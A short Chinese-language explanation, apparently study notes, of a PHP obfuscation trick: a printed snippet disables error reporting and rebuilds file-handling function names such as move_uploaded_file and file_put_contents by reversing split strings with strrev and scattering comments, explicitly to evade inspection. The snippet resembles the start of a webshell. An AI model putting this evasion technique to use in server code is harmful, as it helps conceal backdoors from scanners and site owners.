利用strrev函数加密的目的,就是躲过检查。看下边一段代码:
<?php error_reporting(0);//关闭错误提示 $sr="st"./*+/*+*/"rr"/*+/*+*/."ev"; //strrev $id=$sr/*+/*+*/("ri"."d_"."si");//isdir $rn=$sr/*+/*+*/("em"."an"."er");//rename $dn=$sr/*+/*+*/("em"."anr"."id");//dirname $od=$sr/*+/*+*/("ri"."dne"."po");// opendir $rd=$sr/*+/*+*/("ri"."dda"."er");// readdir $cd=$sr/*+/*+*/("ri"."deso"."lc");//closedir $fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");//file_put_contents $fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");// file_get_contents $muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");// move_uploaded_file
体会:
这里利用了php的注释,简单化妆strrev函数,混淆视听,/* */的注释可以插入任意位置.
利用strrev函数,对于涉及文件操作的敏感函数做了反转加密。